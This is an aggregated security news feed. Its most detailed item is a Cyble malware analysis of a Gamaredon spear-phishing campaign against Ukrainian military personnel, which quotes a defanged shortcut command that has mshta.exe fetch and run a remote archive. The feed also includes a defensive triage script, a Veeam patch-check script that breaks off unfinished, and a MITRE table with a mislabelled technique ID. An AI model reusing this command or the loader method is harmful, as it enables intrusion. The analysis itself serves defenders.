Cybersecurity ranks high among the technologies into which organizations are integrating AI in order to beef up their tech stacks’ capabilities and improve IT productivity. That’s according to CompTIA’s “Building AI Strategy” report, based on a survey of 511 tech and business pros in North America. When respondents were asked which of their tech initiatives are incorporating AI, cybersecurity came in third, mentioned by 61%, behind automation (67%) and data analysis (63%). “In these (three) cases, AI can understand a wide variety of inputs related to the problem at hand, then provide various forms of assistance, such as direct automation of certain tasks, suggestions of patterns found in data, or predictions of cyber attacks,” the report reads. Cybersecurity also made the list of respondents’ main concerns related to their use of AI in technology, ranking third. The top concern was finding the right interaction balance between AI tools and employees, followed by infrastructure costs for AI.
For more information about the intersection of AI and cybersecurity, check out these Tenable blogs:
- “How to Discover, Analyze and Respond to Threats Faster with Generative AI”
- “Securing the AI Attack Surface: Separating the Unknown from the Well Understood”
- “Never Trust User Inputs -- And AI Isn’t an Exception: A Security-First Approach”
- “Do You Think You Have No AI Exposures? Think Again”
- “AI Is About To Take Cybersecurity By Storm: Here’s What You Can Expect”
6 - U.S. government wants to boost security of internet routing
The technology that underpins the internet’s traffic routing is insecure, a dangerous weak link that cyberattackers are increasingly targeting and that represents a global cyber risk. So said the White House, which is urging a variety of players, including government agencies, internet service providers, academia, mobile operators and cloud providers, to help address the problem. The report “Roadmap To Enhancing Internet Routing Security” by the Office of the National Cyber Director was released this week and aims to foster the adoption of technologies that can make the ubiquitous Border Gateway Protocol (BGP) more secure. “As initially designed and commonly operating today, BGP does not provide adequate security and resilience features for the risks we currently face,” the report reads.
For example, BGP is unable to determine if messages exchanged between neighboring networks are authentic, nor can it verify that information from remote networks is legit. Over the past two decades, BGP’s design vulnerabilities have led to serious misconfiguration accidents, and opened the door for a variety of cyberattacks.The good news is that initial techniques to boost BGP’s security and resilience have been introduced and standardized, and are being deployed, specifically security mechanisms based on Resource Public Key Infrastructure (RPKI), according to the document.“This roadmap provides recommendations and guidance necessary to increase the adoption of these initial BGP security technologies across all network operators in the Internet ecosystem,” the report reads.
by Tenable
2024-09-06 08:41:55
Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Military

Key Takeaways
- Cyble Research and Intelligence Labs (CRIL) identified an active Gamaredon campaign targeting Ukrainian military personnel through spear-phishing emails.
- The emails include malicious XHTML attachments, which, when opened, execute obfuscated JavaScript code that downloads a malicious archive to the victim’s system.
- This archive contains a Windows shortcut (LNK) file that, when triggered, initiates the execution of a remote .tar archive hosted on TryCloudflare[.]com via mshta.exe.
- The Threat Actors (TAs) leverage TryCloudflare’s one-time tunnel feature to anonymously host malicious files and access resources remotely without detection.
- The campaign appears to be large-scale and coordinated, as indicated by the widespread distribution of similar files, and it remains ongoing based on the volume and timing of discovered samples.
- The inclusion of a 1-pixel remote image suggests the TAs are tracking victim interactions with the malicious files, likely to monitor the campaign’s effectiveness.

Executive Summary

As the Russia-Ukraine conflict continues to evolve, we remain vigilant in monitoring emerging threats. Previously, we tracked the activities of UNC1151, which targeted Ukraine’s Ministry of Defence with a malicious Excel document designed to compromise sensitive systems. Additionally, we observed UAC-0184’s malware campaign, which deployed the XWORM RAT against Ukrainian targets, utilizing Python to facilitate DLL sideloading techniques for further infiltration.

During our investigation, we came across an ongoing campaign of Gamaredon targeting Ukraine. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-linked Advanced Persistent Threat (APT) group that has been active since at least 2013. It is known for its cyber-espionage activities, primarily targeting Ukrainian government institutions, military, and other critical infrastructure sectors. Gamaredon has been involved in numerous high-profile campaigns, particularly during periods of heightened tension between Russia and Ukraine. Although its operations have been characterized by the use of relatively low-sophistication tools, its success is attributed to its persistence and focus on specific geopolitical targets.

In recent months, Gamaredon has intensified its efforts with a large-scale phishing campaign aimed at Ukrainian entities. This campaign involves sophisticated tactics and widespread phishing attempts, reflecting the ongoing and escalating nature of cyber threats amidst the conflict. The figure below shows the Gamaredon samples observed since the start of August 2024.

Figure 1 - Gamaredon Sample Observed in the Wild

Amid the ongoing Russia-Ukraine conflict, Cyble Research and Intelligence Labs (CRIL) encountered a spear-phishing campaign targeting Ukrainian military personnel. The malicious email contains an XHTML attachment that, upon opening, executes several malicious activities on the infected system. After thorough analysis, our research points to the Gamaredon APT group as the orchestrator of this attack.

Technical Details

The campaign begins with a spear-phishing email bearing the subject “ПОВІСТКА,” which translates to “summons.” The email is themed around a military summons directed at the recipient and includes a malicious XHTML attachment, as shown in the figure below.

Figure 2 - Spear-phishing email (caption not recovered)

Upon opening the XHTML file, the user is presented with a message in Ukrainian stating, “File uploaded to the ‘DOWNLOADS’ folder.” Simultaneously, a RAR compressed folder is silently dropped into the system’s Downloads directory. This action is designed to mislead the victim, making it appear as though a legitimate file has been downloaded. The figure below shows the XHTML message.

Figure 3 - XHTML file

The XHTML file contains obfuscated JavaScript code that executes upon the user opening the file. In the XHTML, the JavaScript is embedded within a `div` element, with the `div id` set to “jwu.” This obfuscated script consists of a Base64-encoded string mixed with a “*” character at random places to evade detection. The JavaScript execution is triggered via the “onerror” event. In some variants, it is activated through the “onmousemove” event, ensuring the malicious code runs as soon as the user interacts with the file. The figure below shows the obfuscated XHTML code.

Figure 4 - XHTML Code

The de-obfuscated string within the “jwu” `div` reveals JavaScript code that contains a Base64-encoded 7zip compressed archive disguised with a .rar file extension. This script decodes the Base64 data and saves the 7zip archive to the Downloads folder as “5-2839-2024_29.08.2024.rar.” Additionally, the script retrieves a 1-pixel remote image, likely serving as a tracking mechanism to monitor the execution and interaction with the malicious file. The figure below shows the de-obfuscated JavaScript.

Figure 5 - Deobfuscated JavaScript

The RAR file contains a Windows shortcut (LNK) file. Upon execution, the malicious LNK file triggers the execution of the remote .tar file via mshta.exe. In this campaign, the TAs leveraged the domain trycloudflare[.]com to host the malicious tar archives. By abusing the TryCloudflare service, TAs can establish a one-time tunnel without the need for an account with Cloudflare. This tunnel enables remote access to resources and data outside the local network, functioning similarly to a VPN or secure shell (SSH) protocol, allowing the attackers to evade traditional detection mechanisms. The Target command of the LNK file is:

“C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f”

The figure below shows the properties of the LNK file.

Figure 6 - Property of LNK File

We were unable to obtain the .tar files in our research.
However, according to an analysis by Cisco Talos, Gamaredon is known for downloading additional malicious files designed to steal sensitive information from the victim’s system.

Conclusion

The ongoing Gamaredon APT campaign demonstrates the group’s persistence and evolving tactics in targeting Ukrainian military personnel. By leveraging spear-phishing emails, malicious XHTML attachments, and obfuscated JavaScript, the attackers deliver harmful payloads while exploiting TryCloudflare’s one-time tunnel feature to host malicious archives. The campaign’s scale and frequency indicate a coordinated, mass phishing effort aimed at sensitive Ukrainian entities.

Recommendations

The following are the recommendations to mitigate the Gamaredon APT campaign:
- Train users to recognize spear-phishing attempts, especially those with suspicious attachments or unexpected military-themed content.
- Implement email security solutions with advanced threat protection, filtering phishing emails and malicious attachments.
- Deploy anti-malware solutions capable of detecting and blocking obfuscated JavaScript and malicious LNK files.
- Monitor for unusual network activity, including connections to TryCloudflare tunnels and other unknown external resources.
- Use application whitelisting to allow only trusted applications and scripts to run.
- Leverage threat intelligence platforms to block known malicious domains, including those abusing TryCloudflare.

MITRE ATT&CK® Techniques

Tactic | Technique | Procedure
Initial Access (TA0001) | Phishing: Spearphishing Attachment (T1566.001) | Gamaredon sends spear-phishing emails with malicious XHTML attachments targeting Ukrainian military personnel.
Execution (TA0002) | User Execution: Malicious File (T1204.002) | The campaign relies on users opening the XHTML attachment, which then triggers JavaScript code execution.
Execution (TA0002) | Signed Binary Proxy Execution: Mshta (T1053.005) | mshta.exe is used to execute a remote .tar archive file hosted on a compromised cloud service.
Defence Evasion (TA0005) | Obfuscated Files or Information (T1027) | The campaign uses obfuscated JavaScript hidden in the XHTML file, including random “*” characters in Base64 encoded strings to avoid detection.

Indicators Of Compromise
The post Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Military appeared first on Cyble.
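For defenders triaging attachments with the traits described under Technical Details above, here is an added Python helper; it is not code from the Cyble report and the sample XHTML it builds is a constructed stand-in (7z magic bytes plus filler text, Base64-encoded with the reported "*" filler, in a `div` with `id="jwu"` and an `onerror` trigger), not a real lure. It flags the event-handler trigger, strips the "*" filler, decodes the Base64, identifies the real container by magic bytes so a 7z body saved under a .rar name is reported as a mismatch, and checks a shortcut Target for mshta.exe fetching a remote URL.

```python
"""Static triage of an XHTML lure with the traits described above (constructed example)."""
import base64
import binascii
import re
from typing import Optional

# Magic bytes of the container types worth telling apart here: the report notes
# a 7zip archive dropped under a .rar name.
MAGIC = {
    b"7z\xbc\xaf\x27\x1c": "7z",
    b"Rar!\x1a\x07": "rar",
    b"PK\x03\x04": "zip",
    b"MZ": "pe",
}

# Event handlers the report names as execution triggers (onload added for coverage).
TRIGGER_RE = re.compile(r"\bon(error|mousemove|load)\s*=", re.IGNORECASE)
# A long quoted run of Base64 alphabet mixed with '*', the reported filler character.
BLOB_RE = re.compile(r"[\"']([A-Za-z0-9+/=*\s]{64,})[\"']")
# Archive file names the script would write to disk.
SAVE_RE = re.compile(r"[\"']([^\"']+\.(?:rar|zip|7z|tar))[\"']", re.IGNORECASE)
# Shortcut Target of the form described: mshta.exe handed a remote (possibly defanged) URL.
MSHTA_RE = re.compile(r"mshta\.exe\s+(?:hxxps?|https?)://([^\s/]+)", re.IGNORECASE)

# LNK Target quoted in the report, used here only as a check input.
REPORTED_TARGET = (
    r"C:\Windows\System32\mshta.exe "
    r"hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f"
)


def strip_filler(blob: str) -> str:
    """Drop the '*' filler and whitespace so the Base64 text can be decoded."""
    return re.sub(r"[*\s]", "", blob)


def decode_blob(blob: str) -> Optional[bytes]:
    """Decode a cleaned blob; None if what remains is not valid Base64."""
    try:
        return base64.b64decode(strip_filler(blob), validate=True)
    except (binascii.Error, ValueError):
        return None


def identify(data: bytes) -> str:
    """Name the container by magic bytes, ignoring whatever extension was claimed."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def triage_xhtml(xhtml: str) -> dict:
    """Collect the features a reviewer wants from a suspicious XHTML attachment."""
    triggers = sorted({"on" + m.group(1).lower() for m in TRIGGER_RE.finditer(xhtml)})
    declared = [m.group(1) for m in SAVE_RE.finditer(xhtml)]
    payloads = []
    for m in BLOB_RE.finditer(xhtml):
        raw = m.group(1)
        data = decode_blob(raw)
        if data is None:
            continue
        kind = identify(data)
        payloads.append({
            "obfuscated": "*" in raw,
            "decoded_size": len(data),
            "payload_type": kind,
            # A 7z body saved under a .rar name is the mismatch the report describes.
            "extension_mismatch": kind != "unknown"
            and any(not n.lower().endswith("." + kind) for n in declared),
        })
    return {"triggers": triggers, "declared_names": declared, "payloads": payloads}


def remote_mshta_host(target: str) -> Optional[str]:
    """Return the remote host when a shortcut Target makes mshta.exe fetch a URL, else None."""
    m = MSHTA_RE.search(target)
    return m.group(1) if m else None


def build_sample() -> str:
    """Construct a benign stand-in for the lure: 7z magic plus filler text, Base64-encoded,
    '*' inserted every 5 characters, placed in the reported div/onerror layout."""
    payload = b"7z\xbc\xaf\x27\x1c" + b"constructed filler, not an archive body " * 3
    b64 = base64.b64encode(payload).decode()
    laced = "*".join(b64[i:i + 5] for i in range(0, len(b64), 5))
    return (
        '<html><body><img src="x" onerror="run()"/>'
        '<div id="jwu">var blob="' + laced + '";'
        'var name="5-2839-2024_29.08.2024.rar";'  # file name quoted in the report
        "</div></body></html>"
    )


if __name__ == "__main__":
    import json
    print(json.dumps(triage_xhtml(build_sample()), indent=2))
    print("mshta remote host:", remote_mshta_host(REPORTED_TARGET))
```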
by CYBLE
2024-09-06 08:30:41
Cequence Security partners with Netskope to provide protection for business-critical APIs

Cequence Security announced a new partnership with Netskope. Through the partnership, Netskope customers can now leverage unique API threat intelligence from the Cequence Unified API Protection (UAP) platform to unlock insights into real-world threats and ultimately strengthen organizational security posture. Cybercriminals increasingly target APIs and deploy automated attacks such as bots, exposing organizations to data breaches, compliance violations, and financial loss. The explosive growth of APIs has created a complex threat landscape, requiring comprehensive solutions … More → The post Cequence Security partners with Netskope to provide protection for business-critical APIs appeared first on Help Net Security.
by Help Net Security
2024-09-06 08:25:12
September 2024: Latest Malware, Vulnerabilities and Exploits

Welcome to Picus Security’s monthly cyber threat intelligence roundup!
by Picus Security
2024-09-06 08:19:25
4 Ways to Future-Proof Your Firm in the Digital Age

From small businesses to giant corporations, sophisticated cyberattacks are not just prevalent but effective at crippling data and services. To safeguard your business against these cybersecurity threats, you must take a holistic approach that spans strong security measures as well as cyber insurance coverage and protection.

Cybersecurity Threats Explained

The first part of securing your business is knowing the different cybersecurity threats that can come at you. Common threats include:
- Phishing Attacks: Cybercriminals take up the guise of trustworthy sources to send fictitious emails and get employees to share sensitive information.
- Malware: Software intended to damage or disable computer systems on a network.
- Ransomware: Malicious software that encrypts data and extorts a ransom for its release.
- Data Breach: Unauthorized access to confidential information, often involving data theft or exposure.
- DDoS Attacks: Using traffic to overwhelm a service so it cannot function properly.

Knowing how these threats work is an important part of devising countermeasures. The proper response is to implement strong cybersecurity so your business is far harder to hack.

Steps to Implement Strong Cybersecurity

1. Secure Your Network: Protect your network from unauthorized access with firewalls, encryption, and secure Wi-Fi connections. Maintain your software and hardware regularly to close the gaps that cybercriminals can take advantage of.
2. Strong Password Policies: Enforce strong password policies that require employees to use complex passwords and change them periodically. Urge members to opt for multi-factor authentication (MFA) for added security.
3. Regular Software Updates: Keep everything updated, from operating systems to applications. Scheduled updates usually include patches for known security risks.
4. Employee Training: Train your employees on cybersecurity. Short instructional sessions on how to identify phishing emails, avoid reusing passwords, and maintain secure practices around software applications can be run regularly, for a couple of minutes at the start of your other critical training discussions.
5. Data Encryption: Encrypt all sensitive data in transit and at rest. This keeps the data (even if captured in transit) unreadable to anyone without the decryption key.
6. Backup Data Regularly: Back up your data on an ongoing basis to a secure location. If you experience a ransomware attack or data breach, backups give you the option of restoring your information offline instead of paying to retrieve it.
7. Access Control: Control exposure to sensitive data with role-based access that follows the principle of least privilege, allowing workers to access only the data they need for their job responsibilities.

Cyber Security Insurance

The importance of having strong cybersecurity defenses in place notwithstanding, planning for failure following a cyberattack is essential as well. Cybersecurity insurance helps address this requirement. There are types of insurance, generally called cyber security insurance or cyber liability insurance, that can be written into a policy to help protect businesses against the impact of these events. This includes the cost of the following:
- Data Breach Notification: The policy provides coverage for the costs associated with notifying affected parties of a data breach.
- Legal Fees: These are your costs to have a legal professional represent you and remain in compliance with applicable laws.
- Ransom Payments: In case of a ransomware attack, insurance can contribute to the ransom recovery.
- Business Interruption: Payments for lost income resulting from a cyberattack shutting down business operations.
- Crisis Management: Costs of implementing a crisis management plan for public relations to manage the aftermath of a cyber incident.

Why is Cyber Security Insurance Needed?
- Financial Protection: Cyberattacks can lead to huge financial losses. Cyber security insurance acts as a financial backstop, giving your business the economic protection to recover without breaking the bank.
- Reputation Management: The reputation of your business is at stake after a cyberattack. Insurance may cover public relations work to restore trust with customers and stakeholders.
- Peace of Mind: With your business secured by cyber security insurance, you can move on to the next challenge, such as growth or innovation.

Having a dedicated developer and following sound programming practices can shield you from many security failures, but even the most knowledgeable programmer should plan exactly what to do if the site does get hacked. A clear incident response plan is imperative for dealing with the fallout of a cyber attack. Your plan should include:
- Preparation: Create a cybersecurity team and conduct regular practice sessions.
- Detection: Set up monitoring to catch possible intruders.
- Containment: Immediately isolate infected systems to prevent the attack from spreading.
- Removal: Take the malware off your network, and patch any security holes.
- Recovery: Return to normal operations by restoring systems, applications, and data from backups.
- Insights Gained: Review the incident and what was learned, to further strengthen corporate defenses against future attacks.

Keeping your company secure in the digital era means implementing comprehensive cybersecurity protocols, training employees, and making sure to have cyber security coverage. You can get your business ready for the ever-changing game of cyber threats if you know what to look out for and how to protect yourself! Cybersecurity insurance is one of the best ways to make sure that your business has a backup plan in case things don’t go as planned.
by The Cyber Express
2024-09-06 08:13:21
Apache fixed a new remote code execution flaw in Apache OFBiz

Apache addressed a remote code execution vulnerability affecting the Apache OFBiz open-source enterprise resource planning (ERP) system. Apache fixed a high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5), affecting the Apache OFBiz open-source enterprise resource planning (ERP) system. Apache OFBiz® is an open source product for the automation of enterprise processes that includes framework components and business […]
by Security Affairs
2024-09-06 08:12:53
Tewkesbury Council Shuts Down Systems After Cyberattack, Investigation Underway

Tewkesbury Borough Council has declared a major incident following a cyberattack that disrupted its operations on Wednesday afternoon. The incident prompted the council to take immediate action by shutting down its systems to contain the attack. As the investigation unfolds, the council’s Chief Executive, Alistair Cunningham, has reassured the public that there is currently no evidence of data being removed or exfiltrated from their systems.

Tewkesbury Borough Council Cyberattack: Immediate Response and Ongoing Investigation

Upon discovering the cyberattack, Tewkesbury Borough Council enacted “necessary cyber response steps” to address the situation. The council’s action included shutting down all systems to prevent further potential damage. An ongoing investigation is being conducted with assistance from the National Cyber Security Centre and the counter-fraud agency. The council has emphasized that there is no indication of personal data being compromised at this time.

In an official statement, the council provided precautionary advice to residents and customers, urging them to remain vigilant. The advisory highlights the importance of being cautious of phishing emails and fraudulent activities, using strong and unique passwords, and promptly changing passwords if any suspicious activity is detected. The council also recommended checking further guidance available on the National Cyber Security Centre’s website.

Public Communication and Support

In a statement to BBC Radio Gloucestershire, Cunningham detailed the discovery of unknown user accounts within the council’s system, which led to the immediate system shutdown. He confirmed that there was no evidence suggesting that data had been removed or exfiltrated. Cunningham stressed that the primary focus is on ensuring services for vulnerable residents while investigating the extent of the cyberattack.

“We have now re-established our phone line and are working on building new computers to expand our phone line capabilities,” Cunningham said. He also pointed out that although the council’s website remains operational and unaffected, normal services are limited. “I don’t want someone who’s at risk of losing their house or who can’t feed their children not to be able to talk to my staff,” Cunningham added.

To assist residents, council staff will be available at several locations:
- Bishop’s Cleeve Parish Council until 15:00 BST
- Churchdown police bus at Tesco car park until 16:00 BST
- Brockworth Community Centre at Court Road until 16:00 BST

Data Protection and Community Assurance

The council has appointed Graeme Simpson as the Data Protection Officer to handle inquiries related to the cyberattack on Tewkesbury Borough Council. Residents concerned about the data breach can contact Simpson via the email address provided in the council’s communication. Despite the current challenges, the council is committed to providing updates and ensuring that residents are informed of any potential risks to their data.

As part of its ongoing response, the council continues to work diligently to understand the full scope of the cyberattack. “We do not know the extent of the infiltration of our system,” Cunningham admitted. He emphasized the importance of not reopening all services until a thorough assessment is completed, noting that waste and recycling services remain operational during this period.

The Cyber Express reached out to Tewkesbury Borough Council for further details on the cyberattack. As of now, no additional official statements have been provided.
by The Cyber Express
2024-09-06 08:00:20
How cybercriminals attack young gamers: the most common and dangerous scams | Kaspersky official blogOur new report investigates cyberthreats aimed at child gamers.
by Kaspersky
2024-09-06 08:00:14
Veza and HashiCorp join forces to help prevent credential exposureVeza announced a partnership with HashiCorp to deliver an integrated solution for solving modern identity security challenges. Together, the Veza Access Platform and HashiCorp Vault empower joint customers to strengthen their identity security posture by bringing least privilege to the management of secrets and keys. With cloud and SaaS investments maturing rapidly, coupled with the advent of new technologies like Generative AI (GenAI), the complexity of enterprise environments has created a significant challenge for security … More → The post Veza and HashiCorp join forces to help prevent credential exposure appeared first on Help Net Security.
by Help Net Security
2024-09-06 07:59:24
Avis Car Rental Suffers Data Breach Exposing Customer InformationAvis Car Rental has reported a data breach affecting customers' personal information after an unauthorized party accessed one of its business applications. The breach occurred between August 3 and August 6, 2024, compromising customer data, including names and other sensitive details. Avis says it has since contained the breach, launched an investigation with cybersecurity experts, … The post Avis Car Rental Suffers Data Breach Exposing Customer Information appeared first on CyberInsider.
by Cyber Insider
2024-09-06 07:58:01
SEC Accuses Former CIRCOR Executive of Misleading Financial DisclosuresThe US Securities and Exchange Commission (SEC) has accused a former CIRCOR executive of misleading financial disclosures. The allegations revolve around false statements made regarding the company's finances. This case highlights the importance of accurate and transparent financial reporting. The SEC announced that it has filed fraud charges against Nicholas Bowerman, the former finance director of CIRCOR International Inc., a previously publicly traded technology manufacturer. According to the SEC, Bowerman's fraudulent activities led to misleading financial disclosures by the company from 2019 through 2021, impacting CIRCOR's public financial statements. The SEC also revealed that CIRCOR has settled related internal accounting charges, citing deficiencies in its financial controls that contributed to the situation.
The Allegations Against Bowerman
Bowerman, who was employed at Pipeline Engineering, a U.K.-based business unit of CIRCOR, is accused of engaging in a range of fraudulent practices over two years. The SEC's complaint asserts that between 2019 and 2021, Bowerman manipulated Pipeline Engineering's internal financial records, leading to inaccurate figures being incorporated into CIRCOR's consolidated financial statements. To carry out his fraudulent actions, Bowerman is alleged to have taken multiple deceptive steps, including manipulating account reconciliations, falsifying certifications, fabricating bank confirmation documents, and actively misleading CIRCOR's senior management and external auditors. The SEC claims that these efforts concealed the true financial position of the business unit and resulted in CIRCOR's public financial disclosures overstating its performance by millions of dollars for fiscal years 2019 and 2020, as well as for the nine-month period ending on October 3, 2021.
CIRCOR's Internal Control Failures
In addition to the charges against Bowerman, the SEC's findings also highlight broader issues within CIRCOR's internal accounting systems. According to the SEC's order, the company lacked sufficient internal controls to properly oversee its financial statement preparation, account reconciliation processes, and access to bank accounts. These gaps in oversight allowed Bowerman's fraudulent activities to go undetected for an extended period. The SEC's investigation revealed that CIRCOR's inability to detect Bowerman's misconduct contributed to the company's overstated financial performance during the two-year period in question. The company was found to have violated the federal securities laws' financial reporting, books and records, and internal accounting controls provisions.
CIRCOR's Response and Remedial Measures
In response to the discovery of the fraudulent activities, CIRCOR took immediate action. The company self-reported the financial reporting violations to the SEC shortly after launching its own internal investigation. This proactive cooperation played a significant role in mitigating the SEC's enforcement actions against CIRCOR. The SEC acknowledged CIRCOR's extensive cooperation throughout the investigation, noting that the company provided detailed examples of Bowerman's unauthorized financial adjustments, shared summaries of interviews with witnesses based outside the U.S., and made its employees and external forensic accountants available for questioning. The company also promptly implemented a range of remedial measures to address the identified deficiencies in its internal controls. Key actions taken by CIRCOR included:
- Strengthening its internal accounting controls.
- Hiring additional experienced finance and accounting personnel.
- Cancelling compensation that was scheduled to be paid to a former executive officer.
These actions, coupled with CIRCOR's cooperation with the SEC, led the Commission to decide against seeking a civil penalty against the company. According to Nicholas P. Grippo, Director of the SEC's Philadelphia Regional Office, "While this matter involves serious violations of the securities laws, once the company became aware of the violations, it promptly self-reported, cooperated, and remediated the gaps in its accounting systems. As also reflected in other recent Commission resolutions, this kind of response by a corporate entity can lead to significant benefits including, as here, no penalty."
Charges Against Bowerman
While CIRCOR has settled its case with the SEC, Bowerman faces a more severe set of legal consequences. The SEC has filed a complaint in the U.S. District Court for the District of Massachusetts, charging Bowerman with violations of multiple provisions of the federal securities laws, including those related to antifraud, financial reporting, books and records, and internal accounting controls. The SEC is seeking various forms of relief from Bowerman, including:
- Injunctive relief to prevent him from engaging in further securities law violations.
- Disgorgement of any ill-gotten gains, along with prejudgment interest.
- Civil penalties to further hold Bowerman accountable for his actions.
These charges reflect the seriousness of Bowerman's alleged misconduct, which undermined the integrity of CIRCOR's financial disclosures and harmed investors who relied on the company's public filings. As part of the SEC's final order against CIRCOR, the company has agreed to cease and desist from future violations of the charged provisions of the securities laws.
by The Cyber Express
2024-09-06 07:43:24
U.S. Offers $10M for Info on Five State-Backed Russian HackersThe U.S. government has indicted five Russian military intelligence officers from the GRU and one civilian for their role in a series of cyberattacks on Ukraine and NATO countries. In connection with this, the U.S. Department of State is offering a reward of up to $10 million for any information leading to their capture or … The post U.S. Offers $10M for Info on Five State-Backed Russian Hackers appeared first on CyberInsider.
by Cyber Insider
2024-09-06 07:09:50
Russia-linked GRU Unit 29155 targeted critical infrastructure globallyThe United States and its allies state that Russia-linked threat actors operating under the GRU are behind global critical infrastructure attacks. The FBI, CISA, and NSA linked threat actors from Russia’s GRU Unit 29155 to global cyber operations since at least 2020. These operations include espionage, sabotage, and reputational damage. The United States and its […]
by Security Affairs
2024-09-06 07:04:07
Veeam Security Bulletin Fixes Critical Vulnerabilities for Backup & Replication, Veeam ONE and MoreVeeam has published a new Security Bulletin addressing multiple critical vulnerabilities across its suite of products. The bulletin, identified as KB ID 4649, covers Veeam Backup & Replication, Veeam ONE, Veeam Service Provider Console, Veeam Agent for Linux, Veeam Backup for Nutanix AHV, and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization. The issues it details include several high- and critical-severity vulnerabilities that could affect the security and functionality of Veeam's solutions. This article provides a short overview of the updates offered by the bulletin.
Key Highlights from the Veeam Security Bulletin
Here's a detailed look at the vulnerabilities discovered and their respective fixes:
1. Veeam Backup & Replication
Several vulnerabilities affect Veeam Backup & Replication 12.1.2.172 and earlier:
- CVE-2024-40711: A critical vulnerability allowing unauthenticated remote code execution (RCE). Discovered by Florian Hauser of CODE WHITE GmbH, it carries a CVSS v3.1 score of 9.8.
- CVE-2024-40713: A high-severity vulnerability enabling a low-privileged user to alter Multi-Factor Authentication (MFA) settings and thus bypass MFA. CVSS v3.1 score: 8.8.
- CVE-2024-40710: A series of high-severity vulnerabilities allowing remote code execution (RCE) as the service account and extraction of sensitive information. CVSS v3.1 score: 8.8.
- CVE-2024-39718: Allows low-privileged users to remotely delete files on the system with service account permissions. CVSS v3.1 score: 8.1.
- CVE-2024-40714: A high-severity TLS certificate validation weakness that can let an attacker intercept sensitive credentials during restore operations. CVSS v3.1 score: 8.3.
- CVE-2024-40712: A path traversal vulnerability permitting local privilege escalation (LPE) for an attacker with low-privileged access. CVSS v3.1 score: 7.8.
These issues are fixed in Veeam Backup & Replication version 12.2 (build 12.2.0.334).
2. Veeam Agent for Linux
Veeam Agent for Linux version 6.1.2.178 and earlier is affected by:
- CVE-2024-40709: A high-severity vulnerability enabling local privilege escalation to root. CVSS v3.1 score: 7.8.
This issue is resolved in Veeam Agent for Linux version 6.2 (build 6.2.0.101), which is included with Veeam Backup & Replication 12.2.
3. Veeam ONE
Veeam ONE 12.1.0.3208 and earlier versions are affected by several vulnerabilities:
- CVE-2024-42024: Allows remote code execution on the Veeam ONE Agent machine by an attacker in possession of the service account credentials. CVSS v3.1 score: 9.1.
- CVE-2024-42019: Grants access to the NTLM hash of the Veeam Reporter Service account; requires user interaction. CVSS v3.1 score: 9.0.
- CVE-2024-42023: Enables low-privileged users to execute code remotely with Administrator privileges. CVSS v3.1 score: 8.8.
- CVE-2024-42021: Allows attackers with valid access tokens to access saved credentials. CVSS v3.1 score: 7.5.
- CVE-2024-42022: Allows modification of product configuration files. CVSS v3.1 score: 7.5.
- CVE-2024-42020: HTML injection vulnerability in Reporter Widgets. CVSS v3.1 score: 7.3.
These vulnerabilities are addressed in Veeam ONE v12.2 (build 12.2.0.4093).
4. Veeam Service Provider Console
Veeam Service Provider Console (VSPC) 8.0.0.19552 and earlier versions are affected by:
- CVE-2024-38650: A critical vulnerability permitting low-privileged attackers to access the NTLM hash of the service account on the VSPC server. CVSS v3.1 score: 9.9.
- CVE-2024-39714: Allows low-privileged users to upload arbitrary files, leading to remote code execution on the VSPC server. CVSS v3.1 score: 9.9.
- CVE-2024-39715: Similar to CVE-2024-39714, but through REST API access. CVSS v3.1 score: 8.5.
- CVE-2024-38651: Allows low-privileged users to overwrite files, leading to remote code execution. CVSS v3.1 score: 8.5.
The fixes are included in Veeam Service Provider Console v8.1 (build 8.1.0.21377).
5. Veeam Backup for Nutanix AHV and Other Plug-Ins
Veeam Backup for Nutanix AHV Plug-In 12.5.1.8 and earlier, as well as Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In 12.4.1.45, are affected by:
- CVE-2024-40718: Allows local privilege escalation through an SSRF vulnerability. CVSS v3.1 score: 8.8.
These issues are resolved in Veeam Backup for Nutanix AHV Plug-In v12.6.0.632 and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In v12.5.0.299, both included with Veeam Backup & Replication 12.2.
Conclusion
This Veeam Security Bulletin outlines critical updates and fixes for multiple Veeam products. Users are advised to update to the latest versions of Veeam Backup & Replication, Veeam Agent for Linux, Veeam ONE, Veeam Service Provider Console, and the related products to mitigate these vulnerabilities; CVE-2024-40711, an unauthenticated RCE on the backup server itself, is the one to prioritize. Regular updates and vigilant security practices remain essential in protecting against potential threats and ensuring the integrity of data protection solutions.
by The Cyber Express
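As a practical follow-up to the bulletin above, here is an added example (not Veeam's code or tooling) of checking an inventory of installed builds against the fixed builds the bulletin lists. The product names and build numbers come from the bulletin summary; the inventory dictionary is constructed sample input, and the product keys are this example's own labels. The point it makes is that a bulletin names the last build known to be affected, not every affected build, so any build below the fixed build has to be treated as unpatched, even if it is newer than the "affected" build quoted.

```python
"""Compare installed Veeam builds with the fixed builds from security bulletin KB4649.

Added example, not Veeam's code.  Build numbers are those quoted in the bulletin
summary; SAMPLE_INVENTORY is constructed sample input, not real hosts.
"""
from __future__ import annotations

# product label (this example's own) -> (last build listed as affected, first fixed build)
FIXED_BUILDS = {
    "Veeam Backup & Replication": ("12.1.2.172", "12.2.0.334"),
    "Veeam Agent for Linux": ("6.1.2.178", "6.2.0.101"),
    "Veeam ONE": ("12.1.0.3208", "12.2.0.4093"),
    "Veeam Service Provider Console": ("8.0.0.19552", "8.1.0.21377"),
    "Veeam Backup for Nutanix AHV Plug-In": ("12.5.1.8", "12.6.0.632"),
    "Veeam Backup for OLVM and RHV Plug-In": ("12.4.1.45", "12.5.0.299"),
}


def parse_build(version: str) -> tuple[int, ...]:
    """'12.1.2.172' -> (12, 1, 2, 172).  Tuples compare component-wise, which is
    exactly the ordering build numbers need; a non-numeric string is rejected."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric build: {version!r}")
    return tuple(int(p) for p in parts)


def assess(product: str, installed: str) -> str:
    """Classify one installed build.

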